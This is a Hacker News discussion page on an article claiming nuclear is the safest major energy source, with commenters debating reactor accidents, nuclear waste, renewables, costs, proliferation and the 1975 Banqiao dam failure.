hacker news with inline top comments    .. more ..    1 Aug 2017 Best
home   ask   best   3 weeks ago   
Out of all major energy sources, nuclear is the safest ourworldindata.org
632 points by mpweiher  23 hours ago   588 comments top 88
payne92 22 hours ago 17 replies      
I believe the politicization of nuclear energy (the resulting lack of investment & innovation) will go down as one of the major blunders in human history.

We'd be in a far, far better situation with greenhouse gasses if we (as a human race) had continued to invest in nuclear energy. There would have been mishaps along the way, but at a much smaller scale than we're experiencing now with deaths from air pollution and looming risk of a warming planet.

We'd have much, much safer systems with modern reactor designs.

Animats 19 hours ago 9 replies      
It doesn't kill many people, because even when there's a disaster, there's time to evacuate. But you lose an entire city once in a while.

Major reactor disasters so far:

- SL-1. Steam explosion due to control rod lifted too far during maintenance. Small experimental reactor, built in the middle of nowhere (Idaho Reactor Test Station) for good reason. Inherently unsafe design.

- Three Mile Island. Meltdown due to cooling water failure due to instrument confusion. Contained by good containment vessel. No casualties. That's what should have happened at Fukushima.

- AVR pebble bed reactor. Pebble jam, radiation leak into ground. Contained, but too much of a mess to decommission.

- Chernobyl. Meltdown and fire due to operational error during testing. Totally inadequate containment. Entire region evacuated and contaminated for decades.

- Fukushima. Loss of coolant and meltdown. Containment vessel too small, reactor cores melted through in three reactors. Containment problem well known in advance; Peach Bottom PA has same design.

A big, strong, containment vessel can keep a meltdown from becoming a major disaster and has done so at least twice.Size matters; a large containment vessel faces lower pressures when all the water boils to become steam. But a good worst-case containment vessel can cost as much as the rest of the plant.

Some of the recently-touted small reactor designs try to omit a containment vessel on the grounds that their design couldn't possibly melt down. That's probably not a good approach.

simias 22 hours ago 5 replies      
People are scared of nuclear energy for the same reason that they're scared of taking an airplane. Even though it's technically and statistically very safe, the perceived risk appears much greater.

In particular in both cases when something goes wrong it tends to go extremely wrong and you're completely helpless to stop it. In contrast getting in a car accident or slowly suffocating in coal power plant emissions seem manageable.

Personally I'm of the opinion that going all nuclear would be a mistake but on the other hand it's a great way to move away from coal and petrol while we're still figuring out how to scale renewable energies (and maybe fusion, but that's still a moonshot). It provides cheap, reliable and reasonably safe energy with very little CO2 emissions.

I'm more worried about global warming than Fukushima and I'd gladly trade even a dozen of Fukushima-type incidents in the next decades (highly unlikely) if it could stop global warming and its dire, hard-to-revert consequences.

In particular I genuinely do not understand why most ecologists seem to be staunchly anti-nuclear. I can understand asking for better funding in renewable R&D and planning for a transition but, at least in Europe, ecologists seem to favor dropping nuclear immediately, no matter the cost. For instance they applauded when Germany decided to completely stop producing nuclear energy, even if it meant more pollution in the short term. I find that hard to justify.

the_gastropod 22 hours ago 3 replies      
It appears that these figures take into account _just_ energy production. They don't seem include the mining, enriching, construction of reactors, disposal of waste, decommissioning reactors, etc. When mining low-grade ore (which isn't uncommon, and is becoming more command as high-grade ore becomes more scarce), nuclear plants are as inefficient as coal-fired plants [1]. Nuclear advocates tend to ignore the full system, and focus on where nuclear shines: power production. The setup to get to that point is extremely costly.

[1] https://www.stormsmith.nl/i05.html

beat 20 hours ago 4 replies      
Of course, this is only comparing to fossil sources, not solar, wind, or other renewables (except biomass).

I don't think this is going to matter in the end, though. The best, most optimistic arguments the nuclear proponents can make would still take 20-30 years to build out enough to make a standard-deviation difference in greenhouse gasses.

Meanwhile, solar/wind are already hitting production costs that rival or beat nuclear, with lower setup costs and other barriers to entry. A wide variety of storage are being actively developed (with real investor support) to cache cheap surplus production from solar/wind, making a mostly-solar grid viable. What will our solar/wind/storage grid look like in 30 years?

Nuclear as a stepping-stone to solar won't matter. It's faster and easier to just to straight to solar.

Tomte 21 hours ago 10 replies      
Before Chernobyl blew up, nuclear energy proponents promised us, nuclear energy was safe.

When Chernobyl blew up, it was obviously a stupid Soviet design, with stupid operating personnel. But now we've got new reactors, they are safe! Nothing could ever happen!

Then Fukushima blew up. That was obviously okay, because it was a Tsunami in conjunction with a few other improbable acts, and we obviously can't expect the nuclear industry to plan for that!

So we're now in the next round. Again, we're totally safe. We've got passive reactors. Really disruptive (g) tech!

I'm sorry, I said it before and I said it again: proponents of nuclear energy have either been lying to us every single time over the last decades, or they can't really manage nuclear energy.

I don't care which one it is, and I don't care whether they believe nuclear energy is safe now. They have been playing with catastrophes of a magnitude we can't really comprehend, and the best they manage to do is "it could have been even worse" and "we promise this was the last time".

As far as I'm concerned, I'm all for making sure it was the last time.

cjsuk 22 hours ago 12 replies      
Apart from the waste.

We really don't know what to do about it other than bury it and leave it for a few tens to hundreds of generations in the future to deal with with the hope that they will know what to do.

So it's the safest option. But only for now. We might just be dooming our descendants to deal with the mess and they might be in a worse state than we are now.

chris_va 21 hours ago 3 replies      
There are a couple of things everyone should know when it comes to energy production:

1) Energy investment is primarily driven by cost, not perceived/actual safety. Safety regulations do affect cost, but not enough to significantly change investment (at least in the US, with the current conditions).

2) Base load power and intermittent (e.g. solar/wind) power are not the same thing, and are not comparable. The concept that "solar and wind will save us all" by themselves is fundamentally incorrect, and actually they make things worse in many ways.

Nuclear fear mongering has resulted in high levels of regulations around nuclear power, but even without that natural gas has an edge in $/kWh. There just hasn't been demand to build nuclear. On top of that, nuclear needs to run 24/7 to amortize high capital costs. With solar/wind, there is high variability in grid supply, so nuclear is significantly less cost effective, and is getting phased out in favor of low-capex plants (i.e. natural gas).

Barring some energy storage miracle, we'll eventually end up with ~35% renewables, 15% hydro, 50% natural gas in the US, with HVDC interconnect. No nuclear, no coal.

(source: I work in a Climate and Energy R&D group)

eloff 22 hours ago 4 replies      
My understanding, which is admittedly drawn from HN "napkin math" , is that at current prices for solar and wind, nuclear is a non-starter. That trend is only intensifying. It seems to me that nuclear could have been a good option, but because we've neglected it for so long, squashed innovation with regulations (not necessarily complaining that it didn't need the regulations!) it is uncompetitive economically and will likely stay that way for the near future. Amazingly enough even coal is uncompetitive in many parts of the world now too. The future is starting to turn green under the invisible hand of market economics.
lootsauce 22 hours ago 0 replies      
This report seems to discount the tail risks involved with potential future nuclear accidents. Lets ignore the very complicated question of risk tradeoffs vs other sources for the moment.

Nuclear power has extreme tail risk that is hard to quantify based on the few examples of it happening. For the thee major events we can reference how do we know we didn't simply get lucky?

With fukushima for example, "Japan's prime minister at the time of the 2011 earthquake and tsunami has revealed that the country came within a paper-thin margin of a nuclear disaster requiring the evacuation of 50 million people." [1]

Clearly the lack of deaths directly attributable to nuclear accidents does not accurately capture the risks.

So what exactly is the risk of a catastrophic event that has thankfully never happened but could? Its not clear but rather than rolling dice with those risks we can actually make better systems without those unquantifiable risks in the first place. That takes us to the tradeoff calculus.

Just in the realm of nuclear power there are far better approaches we should be investing in as opposed to traditional plants such as LFTR [2] which does not have proliferation, waste or meltdown risk.

Picking on coal is a little unfair at this time because coal is being supplanted by much cleaner natural gas purely on market forces and solar and wind are growing dramatically. Of course there are issues with these as well, scaling issues and their own kind of impacts but they do not harbor the same kind of unquantifiable massive tail risk of traditional nuclear.

[1] http://www.telegraph.co.uk/news/worldnews/asia/japan/1218411...

[2] https://en.wikipedia.org/wiki/Liquid_fluoride_thorium_reacto...

ThinkBeat 20 hours ago 1 reply      
The discussion I have seen so far on this thread go something like this:

1. Nuclear is really safe. The best. 2. Someone brings up an incident that actually happened.3. Apologists excuse the incidents that happened because a. It wasnt designed right b. It was due to corruption c. It was bad planning. etc.

We live in the real world here. You dont prove nuclear is safe by excusing every accidentand actually using the disaster to prove how safe it is.

titzer 20 hours ago 2 replies      
The ironic thing is, and I'll probably be downvoted for even positing this, but Chernobyl was the best thing that ever happened to that local environment, at least when you look how local wildlife has bounced back since it's been cordoned off as an exclusion zone.


inputcoffee 22 hours ago 3 replies      
Two important points:

1. What about wind and solar?

2. The death/unit energy misses out the fact that we spend a lot more to keep nuclear safe because we are worried about it. If we spent a fraction of the same amount on other energy, we might get similar safety results.

jesus92gz-spain 22 hours ago 3 replies      
How can nuclear (fision) energy be safer than wind/solar/hydro? New efficient solar cells should be enough, environment friendly, and safer than other alternatives as long as the manufacturing of these are environment friendly as well. Also, everyone can setup their own solar plant at home, I almost did so, but the price of the materials and the setup are too high for me.

I'd like you to consider if nuclear material is useful for something apart from generating energy. It may be useful for other things we don't even know right now, and in the future we may have consumed all the resources.

thinkcontext 21 hours ago 1 reply      
I find this line of reasoning a little misleading. Looking at nuclear's safety record isn't entirely the correct measure, its that the potential consequences are so extreme.

Consider Fukushima. In some ways Japan got lucky, it was entirely possible that an additional reactor on the site could have melted down and the holding pond could have breached. Because of this they were having to consider evacuating areas on the outskirts of Tokyo. Obviously, if that had happened we wouldn't even be having this conversation.

I don't claim that we have considered the risks appropriately, have a sensible nuclear policy, or are considering nuclear correctly wrt climate change. But to claim nuclear is the safest because direct deaths to date are lower is not the full story.

DrNuke 22 hours ago 0 replies      
YCombinator was investing in nuclear energy recently, so an update may be nice here, both at short and medium term level. Thanks in advance.
xelas 17 hours ago 0 replies      
Let's cut a crap, shell we? We can't solve climate change problem which might be acute for last 20 years, yet we believe somehow that we are able to solve storage issue of nuclear waste for next 100 000. Egyptian pyramids are ONLY 5000 years old! And we are not 100% sure what is written in there.

How do you warn next generation after 10 000 years, that some particular site is dangerous/radiaoctive? How do we keep something safe for 100 000 years? Is our Earth look same after 20 000 years, 50 000 years, 70 000 years? Will there be new volcano or shift of tectonic plates? Ice age? How do you keep such waste safe?

Even as of today, there is no final storage solution for spent nuclear fuel. There is one know being built in Finland, and it is just for waste produces in Finland. BTW, there is very nice movie about it: Into Eternity. You should look it!

moomin 21 hours ago 1 reply      
I'm something of a fan of nuclear power, but there's no way it's safer than a solar panel array.

Ah, they didn't include renewables. Colour me surprised.

have_faith 23 hours ago 0 replies      
Is it the safest when projecting for increased usage? While also taking into account modern threat vectors to a nuclear plant? I have no idea, just thinking out loud.
JoshMnem 19 hours ago 0 replies      
Arguments for nuclear power tend to ignore a few things:

- They talk about ideal power plants, but not actual power plants. Are they assuming that when the world switches to nuclear, that every country will build these ideal types of plants and maintain them well?

- Pro-nuclear arguments don't talk about inevitable wars. When nuclear power plants are scattered across the world in countries that will eventually become unstable, the potential outcomes look different. We are living through an amazing time for peace in many countries, but it isn't a given that things will remain peaceful like this.

- Radiation has a cultural effect as well, and those plants and storage facilities make likely targets, since radiation disasters tend to cause people to panic.

- After there is no more power from given plants or fuel, there is less incentive to take care of the waste and cleanup.

I'm not entirely against nuclear power, but I think that it's more complicated of an issue than most nuclear proponents claim.

Energy efficiency and use reduction are two other areas to consider. If it's possible to change behavior and opinions around nuclear energy then it should be possible to change behavior and opinions about efficiency.

chicob 21 hours ago 0 replies      
Fission power's bad rep is bad for fusion power, the latter being way more safe in any respect.

Anyway, although it is a serious issue, to this day no cities had to be evacuated permanently because of air pollution.

Regretfully, nuclear energy has an aura of doom, and investment in nuclear power plants wrongfully reek of hubris.

Even if it isn't a renewable source, fission power is one of our best allies in tackling CO2 emissions. At least it may buy us some time before fusion power and the dissemination of renewables.

xg15 22 hours ago 11 replies      
Can anyone explain to me why "deaths/tWh" is even a meaningful measure?

Of course nuclear energy has one of the highest Wh outputs, no-one is disputing that. However, what does that have to do with the risk of use? That seems like a measure very skewed to make arguments in favour of nuclear power.

I might as well argue that car drivers are safer than pedestrians because the average deaths/horse power is vastly lower.

Also, why did they leave away hydro, water and wind power in those "deaths per x" charts?

epistasis 20 hours ago 1 reply      
Before we even get to the safety, and the disposal of the nuclear waste, we have huge difficulties with the basic economics and construction of nuclear in the US.

The two plants under construction, Summer and Vogtle, have been plagued by construction difficulties and cost overruns. The Summer plant was just finally cancelled today. It seems that the Vogtle plant is going to follow the same route.

The management competence and institutional knowledge needed to build these large, insanely expensive projects seems to have disappeared. The time for nuclear in the US is done. Other options are cheaper, faster, and more responsive. And that's ignoring the political aspect of it all.


frabbit 19 hours ago 0 replies      
As the article makes clear, this another technology that might be useful in the future, but is currently unusable thanks to the problem of the waste generated from it. There are no safe options for storing nuclear waste right now.

It really is time that we start looking at cutting back mindless generation and consumption of energy and that mostly means a big shift in lifestyle for North American and European consumers.

Either that or else you can all explain to your children and grandchildren (whom you love very much and would do anything for etc.) that you decided that living an hour's drive or more from work and commuting in every day while eating fresh dragonfruit and shrimp flown from the other side of the world was just fine.

Reduce. Re-use. Recycle. Time to start actually working on the first of those.

bmcusick 21 hours ago 4 replies      
Ctrl+F "Solar", "Wind". No matches found.

That's weird, huh? I'm all for a rational assessment of risk, but shouldn't they be on the list?

Actually, I've seen such comparisons, and solar and wind do pretty well. They don't kill anyone from air pollution and global warming, but manufacturing and maintenance isn't risk-free. When you install things on roofs, sometimes people fall off.

Most solar installation these days however are utility scale deployments in empty fields. It's pretty low risk, plus the same pollution and AGW benefits that nuclear benefits from.

As an aside, I wonder if anyone has done the math on storing high-level nuclear waste on the Moon, now that a fully reusable SpaceX Falcon Heavy is almost here. That might be cheaper than the financial and political costs of places like Yucca Mountain.

vbuwivbiu 21 hours ago 1 reply      
I'm against centralized power generation of any kind. Make a household fusion generator that's safe and maybe I'll consider it, but until then I'm for solar because it can be deployed in a decentralized network (with batteries), and it's clean.

That leaves the problem of the mining and manufacture, which is still centralized. This problem can be solved with GM organisms. We engineer fungi and bacteria to grow on roofs and generate electricity. They'd use CO2 in the growing process too. We can grow batteries in a similar way. Bacteria, yeast and viruses can do anything. They're the ultimate nanotech, we just need to learn how to program them.

pbreit 22 hours ago 0 replies      
I have not skimmed but didn't see wind, solar or hydro?
quantdev 21 hours ago 0 replies      
Trying to understand risk by looking at historic data alone is wrong when you're talking about catastrophic ruin and uncertain tiny probabilities. Add the word weapon in the headline quote to see what I mean,

"Contrary to popular belief, nuclear weapons are the safest modern weapon"

Arguments that nuclear power are safe need to prove that while assuming the worst-case scenario, since the probability of such a scenario is a-priori unknown despite what much of this comment section seems to be claiming.

Solar is knowingly much safer because it is much easier to reason about.

meri_dian 21 hours ago 0 replies      
China is charging ahead with nuclear in order to replace their outdated coal dependent energy infrastructure.


As they develop and improve their reactor technology their plan is to export safer, more efficient fission reactors to the rest of the world.

maho 19 hours ago 0 replies      
While I mostly agree with the article's risk assessments, it unfortunately leaves out one major risk factor: Nuclear proliferation. If more and more countries have access to nuclear power plants, then they also have the possibility to divert significant quantities (SQ) [1] of fissile materials towards nuclear weapons.

I cannot find the source right now, but a talk given by non-proliferation experts outlined how accounting for fissile material in a reactor is about 99% accurate. But even 1% of nuclear fuel, on a nuclear-powered-world scale, is equivalent to hundreds of SQs per year, assuming current genration and next-generation reactor technologies.

A nuclear conflict, even if regional (only a few dozen discharges) can potentially have dire, world-wide consequences. The article should have at least touched on those.

[1]: http://nsspi.tamu.edu/nssep/reference/technical-safeguards-t...

egypturnash 20 hours ago 1 reply      
[misleading headline]

> Here we limit our comparison to the dominant energy sourcesbrown coal, coal, oil, gas, biomass and nuclear energy; in 2014 these sources accounted for about 96% of global energy production. While the negative health impacts of modern renewable energy technologies are so far thought to be small, they have been less fully explored.

tehabe 20 hours ago 0 replies      
One thing is simply missing from the piece. You can't really distinguish between the civil use of nuclear power and the military use.

Maybe there is some reactor design which can fix this but the reactors which are currently being build are not those designs. Also they are build for 60+ years. A lot can happen in 60 years.

Discussing an energy source just by pointing about future developments is not the answer. The EPR reactors in Finland and France are several times over budget and took much longer than planed to build. In the time you could have build wind turbines and solar cells all over the country with an equivalent or higher amount of power output. And according to the current statistics every added kilowatt would have been cheaper than the last one.

Also you might now say, but solar and wind are not always available. But at the same time you think that all problems with nuclear can be overcome but not the storage of electricity?

Taylor_OD 20 hours ago 0 replies      
Most people who I've talked to about their fears over nuclear energy say they wouldn't want to be in the blast zone in case of a meltdown or near a potential terrorist target. Then I pull up the map of existing nuclear plants and more often than not they already live close to one. I've found its a fear thing for most people.
neurotech1 19 hours ago 0 replies      
Nuclear energy is only as safe as the people operating it. Admiral Rickover demanded a high personal standard for reactor personnel, and there was ZERO reactor accidents[0] because of those standards.

IMO Natural Gas/BioGas powered turbine generators are better option to augment wind and solar power generation. The GE LM6000 [1] gas turbine (based on a 747 GE CF6 engine) can produce 40MW+ of electricity. They could even recycle a surplus CF6 engine to reduce manufacturing resources required.

[0] https://en.wikipedia.org/wiki/Hyman_G._Rickover#Safety_recor...

[1] https://en.wikipedia.org/wiki/General_Electric_LM6000

meri_dian 18 hours ago 0 replies      
Flying used to much more dangerous than it is now. But we improved the technology and now it's safe enough that most don't think twice before getting on a plane.

Discussions of nuclear power somehow ignore the fact that, like any other technology, current reactor designs are not the final iteration. They can be improved upon.

Look the Chinese Pebble Bed reactor: https://www.technologyreview.com/s/600757/china-could-have-a...

If everyone aside from the Chinese ignore nuclear power, then the Chinese may be the ones making a fortune selling their advanced reactor designs to everyone else.

ricw 21 hours ago 2 replies      
The quoted statistics are interesting, but irrelevant when it comes to the actual use of nuclear. Furthermore, why are solar and wind energy missing from these stats? They account for 90% of new power in Europe in 2016 [1], and I'd assume similar for the major world economies. I'd like to know who funded this study. It screams of nuclear industry backing...

For anyone still being in disbelief of nuclear being made obsolete:Why has not a single (!) private insurer been willing to fully insure a nuclear facility without government backing?! The reason is simple: the risk is too high, even for insurance companies worth billions.

TLDR: nuclear has, as yet, not worked using private financing.

[1] https://www.theguardian.com/environment/2017/feb/09/new-ener...

SubiculumCode 22 hours ago 0 replies      
While the threats from coal and gas are regularly distributed through time (near constant rate of pollutants) the threat from nuclear energy are sporadic (ie meltdown, terror) and are thus harder to model and assess. Also agree with others that wind and solar are being discounted unfairly despite their growth factors.
a_imho 22 hours ago 1 reply      
I wonder how much nuclear suffers from PR. Clearly statistics are not really effective at changing opinions. But what would happen if popular Elon Musk/Steve Jobs type of public figure get into the lobby game with a nuclear company? Could that swing perception either way?
mncolinlee 19 hours ago 1 reply      
Not true. In the short run, solar is the safest. A massive spill of solar energy is just called a nice day. In the long run, it's the most dangerous. The sun may eventually consume the Earth and much later, go nova.
1337biz 22 hours ago 0 replies      
Logical arguments do not apply in that scenario. Other energy forms might kill people a slow, invisible death. But when a nuclear reactor melts down the pictures of death and drama will go around the world.
komali2 21 hours ago 0 replies      
Now that is an introduction!

>The production of energy can be attributed to both mortality (deaths) and morbidity (severe illness) cases as a consequence of each stage of the energy production process:

A lot of people here may know what mortality and morbidity mean straight off, but I want to share this article as much as possible, and it does a great job reaching out to laymen. I also like how it starts right off with "more energy is good, here's a link demonstrating why, let's move on."

internalfx 22 hours ago 1 reply      
Can anyone comment on if the LFTR is legit?


secult 6 hours ago 0 replies      
Popular belief in any difficult topic is not a good indicator of anything.
_Codemonkeyism 22 hours ago 0 replies      
Most relevant sentence from article

"Here we limit our comparison to the dominant energy sourcesbrown coal, coal, oil, gas, biomass and nuclear energy;"

marcoperaza 22 hours ago 0 replies      
We don't have to choose between energy abundance and good stewardship of the environment. Why do green activists and a majority of Western governments want us to? Attempts to force Western countries to cut emissions, without a corresponding transition to nuclear power, are unacceptable and represent a wealth transfer from rich countries to poor countries.
shams93 22 hours ago 0 replies      
Wind works so well in places like Santa Monica the utilities were able to make it illegal to use wind power for your home. Fortunately they were not able to do the same to solar. We have home owners in california generating more energy than they use with their home solar panels, like my parents they generate more than they use even at the height of the summer.
prewett 18 hours ago 0 replies      
This article severely underestimates the number of deaths by nuclear power by not considering the deaths caused by leakage of radioactive materials over the course of the next 10,000 years. In fact, there really isn't any way to know that number for another 500 years at least.
qweqweqweqw 20 hours ago 0 replies      
I've come to the conclusion that nuclear energy is a good thing when done correctly, sadly we seem to be plagued by 60 year old power plants with severe safety problems still running because the power companies don't care about safety, they just want to run them as long as possible until they fail.
kumarski 20 hours ago 0 replies      
I've been writing about, thinking about, and exploring lithospheric energy extraction for the better part of 20 years.

I studied operations research during college in the hopes of working on India's nuclear supply chain.

The west choked us out of Uranium and Plutonium, similar to how the British choked us out of Rice during the Bengal Famine of 1943.






More than anything, the brown/black people of the world need the west to give in to our demands for the approval of our uranium desires to help us get to progress driven escape velocity Nitrogen + Steel economies.

anotherbrownguy 22 hours ago 1 reply      
Isn't nuclear hysteria created mostly by American CleanTech industry?

Solar is not a reliable source to begin with so you can't use it to power anything critical. It has to be combined with something like nuclear or fossil fuels to have reliable power. But if we go nuclear, we will have 1000s of years worth of power. So, where exactly does Solar fit in?

tabtab 21 hours ago 1 reply      
It's going to be politicized no matter what. Stop spanking humans for having human nature and lecturing them about being more rational. Politicians have to consider perception or they get voted out. It's just a technology that freaks people out on an emotional level and you can't stop that.
pps43 21 hours ago 0 replies      
Comparison is incomplete without taking into consideration BDBA (beyond design basis accidents). Probability of an accident worse than Chernobyl is low, but not zero. Multiply it by economic loss from large densely populated area becoming uninhabitable, and it can easily flip the conclusion.
agumonkey 20 hours ago 0 replies      
A French engineer, Jean-Marc Jancovici, has been claiming this for a decade, with many talks and documents. I'm only 80% fan of his reflection because he doesn't account much for human change and new technological reconfiguration.
jonshariat 20 hours ago 0 replies      
I"m not saying this is the main factor for not choosing nuclear but this should be considered: the one difference with Nuclear is that when a system fails, you can't use that area of land for a few thousand years.
skndr 22 hours ago 0 replies      
With a potential reduction in the Department of Energy's budget, this might not hold. There may not be enough funding to properly dispose of the waste. Not to mention that some of the effects of past storage aren't well-catalogued [0]:

Three years ago the D.O.E. sent the local tribes a letter to say they shouldnt eat the fish they caught in the river more than once a week.


Hanford turns out to be a good example of an American impulse: to avoid knowledge that conflicts with whatever your narrow, short-term interests might be. What we know about Hanford we know mainly from whistle-blowers who worked inside the nuclear facilityand who have been ostracized by their community for threatening the industry in a one-industry town. (Resistance to understanding a threat grows with proximity, writes Brown.) One hundred and forty-nine of the tanks in the Hanford farms are made of a single shell of a steel ill-designed to contain highly acidic nuclear waste. Sixty-seven of them have failed in some way and allowed waste or vapors to seep out. Each tank contains its own particular stew of chemicals, so no two tanks can be managed in the same way. At the top of many tanks accumulates a hydrogen gas, which, if not vented, might cause the tank to explode. There are Fukushima-level events that could happen at any moment, says Carpenter. Youd be releasing millions of curies of strontium 90 and cesium. And once its out there it doesnt go awaynot for hundreds and hundreds of years.

The people who created the plutonium for the first bombs, in the 1940s and early 1950s, were understandably in too much of a rush to worry about what might happen afterward. They simply dumped 120 million gallons of high-level waste, and another 444 billion gallons of contaminated liquid, into the ground. They piled uranium (half-life: 4.5 billion years) into unlined pits near the Columbia River. They dug 42 miles of trenches to dispose of solid radioactive wasteand left no good records of whats in the trenches. In early May of this year a tunnel at Hanford, built in the 1950s to bury low-level waste, collapsed. In response, the workers dumped truckloads of dirt into the hole. That dirt is now classified as low-level radioactive waste and needs to be disposed of. The reason the Hanford cleanup sucksin a wordis shortcuts, said Carpenter. Too many goddamn shortcuts.

[0] http://www.vanityfair.com/news/2017/07/department-of-energy-...

xyproto 19 hours ago 0 replies      
If only there was no connection to nuclear weapons, which are... unsafe.
lasermike026 21 hours ago 0 replies      
The question is how can we do nuclear right? From outward appearances it looks like have been doing it wrong, Three Mile Island, Chernobyl, and Fukushima for example. French nuclear systems appear to get it more right.
unabst 22 hours ago 1 reply      
The public's nuclear acceptance is not about day to day death toll. It's about broken promises and Armageddon.

Looking at the chart, I'd take gas over nuclear in a heartbeat thinking of what nuclear has done to Japan. Nuclear can both power and destroy a country. Gas and other options do not. Neither does solar or wind which are not even in that chart.

Say we have a new technology that is safer than nuclear, but had a one in a million chance to destroy Earth. It would be safest on paper, for however long paper and researchers still existed.

"But Fukushima was a horrible place for a nuclear power plant and it was run by incompetent people," you say. But that's exactly the point. If we make a list of all the plants in the world and the safety measures they undermined and their staffing situation, how many would be stellar? How many would even admit anything?

jwildeboer 17 hours ago 0 replies      
I stopped reading after "Here we limit our comparison to the dominant energy sourcesbrown coal, coal, oil, gas, biomass and nuclear energy"
lordlimecat 21 hours ago 0 replies      
Not shown in the graph: Hydroelectric, which conjures up images of beautiful dams, rather than the hundreds of thousands of people who die at once when it fails.
danieledavi 20 hours ago 0 replies      
We should try to use as much as possible renewable resources and save precious, expensive, rare elements to be used only for scientific research purposes and space missions (propulsion and power plants). We have many alternatives on earth but we don't have energetic alternatives on other planets and outer space.We are just wasting the opportunity to go far.
PeterStuer 22 hours ago 0 replies      
There is one huge problem with nuclear energy. Humanity has time and time again proven they can not handle that kind of responsibility.
VT_Drew 20 hours ago 0 replies      
Can we just stop with this nonsense? If you have a byproduct that has be buried in special containers in the desert, and that land can't be used, and there are people actually trying to come up with symbols that indicate danger that could span all language and culture in case a meteor hits the earth and civilization slowly rebuilds then finds the site, then it isn't "safe" be any stretch of the imagination.
deepnotderp 20 hours ago 0 replies      
This assessment ignores the cm ecological cost of mining and waste disposal, both highly nontrivial concerns.
kaikai 22 hours ago 0 replies      
No one seems to think disposing of nuclear waste is a problem until someone tries to dispose of it in their backyard.
oregontechninja 20 hours ago 0 replies      
Check out NuScale if you want to see what a modern nuclear company is trying to achieve.
jdeibele 22 hours ago 0 replies      
When they use .00 on all the figures it calls into question everything else about the article.
kzrdude 22 hours ago 1 reply      
At the same time, it wasn't predicted that solar power would be this viable, was it?
MR4D 19 hours ago 1 reply      
This is laughable. It's almost like saying that nuclear weapons are safer than sticks and stones because nuclear weapons have killed less people. Never mind that nuclear weapons have the possibility of making our species extinct.

Likewise for nuclear power accidents.

FussyZeus 23 hours ago 6 replies      
The brain is not designed to understand statistics. Nuclear accidents are theatrical and fun, and therefore get a lot of play on the media when they happen. Look no further than the media circus surrounding Fukushima to confirm.

Everybody is scared to death of Sharks, yet sharks killed only 1 person in the US last year. Cows killed 20, 75% of which were deliberate attacks, but almost no one is afraid of a Cow.

Meanwhile 17,775 people died in traffic accidents, yet people jump in cars like it's routine. You're literally 17,000% more likely to die in your own car than you are by a shark, but again, brains don't understand that.

egl2016 21 hours ago 0 replies      
tl;dr: if we assume deleterious effects from CO2-driven global warming and discount effects from long-term storage of high-level nuclear waste, nuclear is safer.
jlebrech 22 hours ago 0 replies      
anorphirith 22 hours ago 6 replies      
the only problem is where to get the uranium, I believe russia gets it from kazakhstan. france from niger. does US buys it from kazakhstan as well ?
dredmorbius 16 hours ago 0 replies      
The maps below correspond roughly to Zhumadian City, Henan Province, China. The region spans about 100 km east-west. It is presently home to over 7 million people.[0]


In 1975, it was the site, or perhaps more accurately, region, of the worst power plant disaster in all history: the Banqiao dam failure. News of this only fully emerged after over two decades.[1] You can spot the reservoir itself at the far left of the images, at mid-height.

In the disaster, a confluence of events lead to the deaths of approximately 171,000 people, with 11 million displaced. There's considerable uncertainty in those numbers.

The causes were multiple: siting, improper engineering, unheeded warnings, a (literal) perfect storm (tropical typhoon striking a cold front and lingering over the region for a full day, dropping over 1 meter of rain), improper emergency plans, failed communications, situational confusion, nightfall, and a hopelessly inadequate response and recovery. Of the deaths, "only" -- a term used advisedly -- 25,000 or so were due to direct flooding. The remaining 150,000 or so succumbed to starvation or disease in the weeks following the events.

And yet: the book as been closed. The cities in the floodplain are rebuilt. The dam itself has been rebuilt. Over 7 million people live in Zhumadian City, 95 millions in Henan Province total.

There is no disaster exclusion zone.

There is no disaster exclusion zone which will persist for the next three centuries.

There is no molten reactor core.

There is no coreium.

There is no radioactive waste which will persist for 10,000 to 1 million years.

The book is closed.

Proponents of nuclear power assume that we can assess risks with tails not of the decade or so of Banqiao, but of 100, 1,000, 1 million years. Utterly outside the scope of any human institutions, or of the human species itself.

Our models of risks and of costs fail us.

(They've failed us as well in the case of fossil fuels, and, quite possibly, for hydro power -- I'm not giving this example as endorsements of either, but to give the story of risk and closure, or its lack. Those are other stories, for other posts.)

The problems with nuclear power are massive, long-tailed, systemic and potentially existential. The same cannot be said of a wind farm or solar array. There is no significant 10,000 year threat from wind power, or solar power. We're not risking 30 - 60 km exclusion zones, on an unplanned basis, of which we've created at least four in the half-decade of significant nuclear energy applications: Hanford, Washington, Three Mile Island, Pennsyvania, Chernobyl, Ukraine, and Fukushima, Japan. And this is with a global plant of some 450 operating nuclear power plants as of 2017[2]

(This compares with over 7,600 power plants in the United States alone.[3])

None of these sites has been fully remediated. In the specific case of Hanford, the current management plan is budgeted at $2 billion, and there is no final management plan in place. This eighty years after the facility first opened.

If the total experience has been, say, 500 reactors, over 50 years, or 25,000 reactor-years of experience, and we've experienced at least four major disasters, then our failure rate is 0.016%.

The global share of nuclear power generation in 2012 was about 10%.[4] Which means that without allowing for increased electrical consumption within existing or extending to developing nations, the plant count would have to increase tenfold.

Holding the reactor-year failure rate constant would mean 80 core meltdowns per century.

Reducing that to the present rate of four meltdowns/century would require reducing the failure rate to 0.0008%. That's five nines, if anyone's counting.

Five nines on a process involving weather, politics, business, social upheaval, terrorism, sabotage, individual psychology, group psychology, climate, communications, response, preparedness....

And ... the involvement of the Japanese Mafia, the Yakuzi, in the management of TEPCO, who operated the Fukushima nuclear power plant.[5]

All of which played a tremendous role in how badly the Banqiao disaster itself played out -- everything which happened at Banqiao by dynamics could just as well have happened in a nuclear plant.

But it wasn't a nuke, it was a dam. And after a few hours, the waters receded, and after a few weeks, the land dried, and after a few months, recovery could start, and after a couple of decades ... even in what was still a poor country ... the recovery was complete.

Banqiao was a disaster, no doubt.

But what it wasn't was a nuclear disaster.



0. https://en.m.wikipedia.org/wiki/Zhumadian

1. http://www.sjsu.edu/faculty/watkins/aug1975.htm

2. https://www.nei.org/Knowledge-Center/Nuclear-Statistics/Worl...

3. https://www.eia.gov/tools/faqs/faq.php?id=65&t=3

5. http://www.iea.org/publications/freepublications/publication...

4. https://www.theatlantic.com/international/archive/2011/12/ya...

swills 21 hours ago 0 replies      
Clean, safe, too cheap to meter! /s
hristov 22 hours ago 1 reply      
You have to be very careful about these studies, because most official government studies flat out lie about the effects of nuclear disasters.

The most egregious example is Chernobyl, where the official Soviet position was that only a single person died from the disaster. But studies from other nations say the death toll may be close to one million. Well believe it or not a lot of these studies that show how safe nuclear is actually take the official Soviet data about chernobyl as truth. (I am not sure whether this is the case for this particular study because their source is behind a paywall).

